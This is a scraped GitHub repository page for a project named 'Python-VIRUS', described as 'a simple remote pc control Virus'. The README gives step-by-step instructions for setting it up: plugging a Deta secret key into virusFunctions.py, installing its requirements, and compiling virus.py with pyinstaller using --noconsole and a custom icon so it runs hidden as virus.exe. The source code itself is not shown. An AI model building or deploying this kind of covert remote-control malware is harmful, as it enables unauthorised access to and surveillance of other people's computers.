Skip to content

raghavendr-a/Python-VIRUS

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Python-VIRUS

A simple remote pc control Virus

Steps

1.Create a Deta account

2.Open virusFunctions.py and paste <YOUR-DETA-SECRET_KEY>

3.Open Command prompt and run pip install -r requirements.txt

4.CD to the cloned repository folder and run
pyinstaller --onefile --noconsole --icon=app.ico --add-binary "C:<YOUR-PATH>AppData\Local\Programs\Python\Python38\Lib\site-packages\cv2\opencv_videoio_ffmpeg454_64.dll;." virus.py --path="C:<YOUR-PATH\AppData\Local\Programs\Python\Python38\Lib\site-packages\cv2"

5.After compilation open dist folder you'll find virus.exe--> your compiled virus file

About

A simple remote pc control Virus

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages